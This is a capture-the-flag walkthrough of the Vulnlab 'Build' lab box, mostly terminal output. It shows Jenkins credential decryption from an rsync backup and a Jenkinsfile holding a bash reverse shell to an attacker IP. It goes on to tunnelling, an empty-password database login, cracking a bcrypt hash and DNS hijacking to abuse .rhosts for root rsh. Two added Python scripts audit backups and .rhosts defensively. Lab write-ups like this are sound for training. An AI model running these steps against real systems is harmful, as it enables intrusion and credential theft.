Here are my notes on the BUILD box from Vulnlab, which has since been deployed to HackTheBox.
BUILD: 10.10.109.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 472173e26b96cdf91311af40c84dd67f (ECDSA)
|_ 256 2b5ebaf372d3b309df25412909f47bf5 (ED25519)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# rsync -av rsync://10.10.109.211/
backups backups
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# rsync -av --list-only rsync://10.10.109.211/backups
receiving incremental file list
drwxr-xr-x 4,096 2024/05/02 09:26:31 .
-rw-r--r-- 376,289,280 2024/05/02 09:26:19 jenkins.tar.gz
sent 24 bytes received 82 bytes 70.67 bytes/sec
total size is 376,289,280 speedup is 3,549,898.87
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# rsync -av rsync://10.10.109.211/backups/jenkins.tar.gz ./jenkins.tar.gz
receiving incremental file list
jenkins.tar.gz
sent 43 bytes received 376,381,250 bytes 1,327,623.61 bytes/sec
total size is 376,289,280 speedup is 1.00
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# mv jenkins.tar.gz jenkins.tar
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# tar -xf jenkins.tar
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# ls
jenkins_configuration jenkins.tar
jenkins_configuration:
Found config.xml, master.key and hudson.util.Secret in the jenkins_configuration tree (the key material sits under its secrets directory).
./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml
There are two config.xml files in this tree:
the top-level one you see first, and a second one further down that is easy to miss.
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
┌──(root㉿kali)-[/home/…/BUILD/10.10.109.211/backups/jenkins_configuration]
└─# grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
jobs/build/config.xml: <password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
The second config.xml, the one in the jobs directory, is the one you need.
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# ./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml
[
{
"id": "e4048737-7acd-46fd-86ef-a3db45683d4f",
"password": "Git1234!",
"username": "buildadm"
}
]
#Only jobs/build/config.xml holds a credential that decrypts with this master.key / hudson.util.Secret pair.
buildadm credential discovered !
https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security
#BUILD-VL
buildadm:Git1234!
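To see what a leaked Jenkins backup like this one exposes, here is an added audit script (not part of the original notes and not from jenkins-credentials-decryptor) that walks the extracted tree and reports every encrypted secret envelope it finds, without decrypting anything. It assumes the Jenkins PAYLOAD_V1 envelope layout (magic byte, IV length, ciphertext length, IV, AES-CBC ciphertext) and takes the backup directory as its only argument.

```python
import base64
import re
from pathlib import Path

# Jenkins stores encrypted secrets in config.xml as <tag>{base64}</tag>. The
# decoded payload (hudson.util.Secret, PAYLOAD_V1) is laid out as:
#   1 byte magic 0x01 | 4-byte big-endian IV length | 4-byte big-endian
#   ciphertext length | IV | AES-CBC ciphertext (PKCS#5 padded)
SECRET_RE = re.compile(r"^\s*<([A-Za-z]+)>\{([A-Za-z0-9+/=]+)\}</", re.MULTILINE)


def parse_secret_envelope(b64: str) -> dict:
    """Validate the envelope structure; raises ValueError if it is not one."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) < 9 or raw[0] != 0x01:
        raise ValueError("not a Jenkins PAYLOAD_V1 secret")
    iv_len = int.from_bytes(raw[1:5], "big")
    data_len = int.from_bytes(raw[5:9], "big")
    if len(raw) != 9 + iv_len + data_len or data_len % 16:
        raise ValueError("length fields do not match the payload")
    return {"iv_len": iv_len, "data_len": data_len}


def find_secrets_in_text(text: str) -> list:
    """Return one record per encrypted secret found in one config.xml."""
    found = []
    for m in SECRET_RE.finditer(text):
        tag, b64 = m.group(1), m.group(2)
        try:
            found.append({"tag": tag, **parse_secret_envelope(b64)})
        except ValueError:
            continue  # braces that are not a Jenkins secret envelope
    return found


def audit_backup(root: str) -> list:
    """Walk an extracted backup and list every encrypted secret it contains."""
    hits = []
    for path in sorted(Path(root).rglob("*.xml")):
        for rec in find_secrets_in_text(path.read_text(errors="replace")):
            hits.append({"file": str(path.relative_to(root)), **rec})
    return hits


if __name__ == "__main__":
    import sys
    for h in audit_backup(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{h['file']}: <{h['tag']}> ciphertext={h['data_len']} bytes")
```

Every hit is a secret that anyone holding master.key and hudson.util.Secret from the same backup can recover, which is why those two files should never travel with the job configs.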
3000/tcp open ppp
-Gitea service.
-Gitea Version 1.21.11
-No public exploits for that version, unfortunately.
-Create an account and see whether there are any interesting repositories.
-No interesting repositories = NOPE !
buildadm:Git1234! - administrator on Gitea.
Jenkins Pipeline Reverse Shell:
Found buildadm/dev repository:
Jenkinsfile = Jenkins pipeline definition
Webhooks = http://10.10.109.211:3000/buildadm/dev/settings/hooks/1
The webhook suggests a Jenkins server builds this repository from its Jenkinsfile.
We can modify the Jenkinsfile in the repository and wait a minute or two for the shell:
pipeline {
    agent any
    stages {
        stage('Pwned') {
            steps {
                sh '''
                bash -c 'bash -i >& /dev/tcp/10.8.0.71/1234 0>&1'
                '''
            }
        }
    }
}
https://blog.apolloteapot.com/vulnlab-build
https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.109.211] 41292
bash: cannot set terminal process group (7): Inappropriate ioctl for device
bash: no job control in this shell
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# whoami
whoami
root
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# hostname
hostname
5ac6c7d6fb8e
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main#
DOCKER-ROOT SHELL !
root@5ac6c7d6fb8e:~# whoami
whoami
root
root@5ac6c7d6fb8e:~# hostname
hostname
5ac6c7d6fb8e
root@5ac6c7d6fb8e:~# pwd
pwd
/root
root@5ac6c7d6fb8e:~# ls
ls
user.txt
root@5ac6c7d6fb8e:~# cat user.txt
cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
Docker Escape:
cat /proc/net/arp
cat /proc/net/route
Check whether other Docker containers talk to the container we are in (neighbours in the ARP cache, routes to other networks).
Think of the Docker network as its own environment: the same post-exploitation, privilege escalation and lateral movement ideas apply inside it !
root@5ac6c7d6fb8e:~# cat /proc/net/arp
cat /proc/net/arp
IP address HW type Flags HW address Mask Device
172.18.0.1 0x1 0x2 02:42:2b:1a:b5:36 * eth0
172.18.0.2 0x1 0x2 02:42:ac:12:00:02 * eth0
root@5ac6c7d6fb8e:~# ls -lah
ls -lah
total 20K
drwxr-xr-x 3 root root 4.0K May 2 2024 .
drwxr-xr-x 1 root root 4.0K May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4.0K May 1 2024 .ssh
-rw------- 1 root root 37 May 1 2024 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
Ligolo-NG as usual:
sudo ip tuntap add user kali mode tun ligolo
./proxy -selfcert -laddr 0.0.0.0:53
sudo ip link set ligolo up
sudo ip route add 172.18.0.0/24 dev ligolo
./agent -connect 10.8.0.71:53 -ignore-cert &
Docker-1: 172.18.0.1
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-11-06 16:32 EST
Nmap scan report for 172.18.0.1
Host is up (0.48s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
512/tcp open exec
513/tcp open login
514/tcp open shell
873/tcp open rsync
3000/tcp open ppp
3306/tcp open mysql
#Empty ROOT Password.
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# mysql -u root -p '' -h 172.18.0.1
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 21
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB []> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin | #Interesting.
| sys |
+--------------------+
5 rows in set (0.130 sec)
use powerdnsadmin;
MariaDB [powerdnsadmin]> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name | master | type | serial | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| 1 | build.vl | [] | Native | 2024050201 | 0 | 0 | 0 | NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.130 sec)
MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 #Interesting Target. | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.124 sec)
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# cat hash.txt
admin:$2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winston (admin)
1g 0:00:00:46 DONE (2024-11-06 16:38) 0.02134g/s 28.43p/s 28.43c/s 28.43C/s winston..incubus
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
admin:winston
Docker-6: 172.18.0.6
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo nmap 172.18.0.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-11-06 16:35 EST
Nmap scan report for 172.18.0.6
Host is up (0.45s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
#powerdnsadmin web service.
admin:winston #From MySQL.
DNS Hijacking:
.rhosts from root-docker:
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
Point admin.build.vl at the Kali IP in PowerDNS-Admin, then rsh to the target as root: the .rhosts entries trust that hostname, and the DNS records decide which IP it maps to.
└─# dig admin.build.vl @10.10.125.25
; <<>> DiG 9.18.16-1-Debian <<>> admin.build.vl @10.10.125.25
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11979
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;admin.build.vl. IN A
;; ANSWER SECTION:
admin.build.vl. 60 IN A 10.8.0.71
;; Query time: 123 msec
;; SERVER: 10.10.125.25#53(10.10.125.25) (UDP)
;; WHEN: Wed Nov 06 16:49:53 EST 2024
;; MSG SIZE rcvd: 59
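The weak link above is trust keyed on a DNS name plus a "+" user wildcard. As an added example (not from the original notes), here is a small .rhosts parser and audit that flags exactly those two conditions; the sample file is constructed to mirror the two entries found in root's .rhosts.

```python
import ipaddress

# .rhosts grants password-less rsh/rlogin access. Each line is "host [user]";
# "+" in either field is a wildcard and a leading "-" denies instead of grants.
SAMPLE_RHOSTS = "admin.build.vl +\nintern.build.vl +\n"  # constructed sample


def parse_rhosts(text: str) -> list:
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append({"host": fields[0], "user": fields[1] if len(fields) > 1 else None})
    return entries


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_rhosts(text: str, account: str = "root") -> list:
    """Return (host, user, reason) for every entry that widens trust."""
    findings = []
    for e in parse_rhosts(text):
        host, user = e["host"], e["user"]
        if host.startswith("-") or (user or "").startswith("-"):
            continue  # negative entries only restrict access
        if host == "+":
            findings.append((host, user, "any host may connect"))
            continue
        if user == "+":
            findings.append((host, user, f"any user on {host} may log in as {account}"))
        if not is_ip(host):
            findings.append((host, user,
                             f"trust is keyed on the DNS name {host}; whoever controls its resolution inherits the trust"))
    return findings


if __name__ == "__main__":
    for h, u, why in audit_rhosts(SAMPLE_RHOSTS):
        print(f"{h} {u or ''}: {why}")
```

On this box both entries trigger both findings, which is the whole privilege escalation in one file: an attacker-controlled PowerDNS-Admin answer for admin.build.vl turns "any user on that host" into "any user on my host".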
Rsh Notes: #TCP Ports: 512,513 and 514.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rsh
https://blog.apolloteapot.com/vulnlab-build
Rsh Command with Examples in Linux
rsh root@10.10.125.25
[SNIP]
root@build:~# whoami
root
root@build:~# hostname
build
[SNIP]
ROOT-SHELL !
root@build:~# whoami
root
root@build:~# hostname
build
root@build:~# ls
root.txt scripts snap
root@build:~# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Remaining lines of the initial nmap scan:
8081/tcp open blackice-icecap
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds
Found Gitea or another Git hosting site? Create an account and check the public repositories; they are a good source of information during enumeration.
Got an admin account on Gitea or another Git site? Check the repositories' webhooks, public and private, to see whether an external system (such as a CI server) consumes them.
That is the link the tester can take advantage of.
For ordinary users of a Git site, administrator permission or enough privilege to control the right repositories is all it takes to run this kind of attack.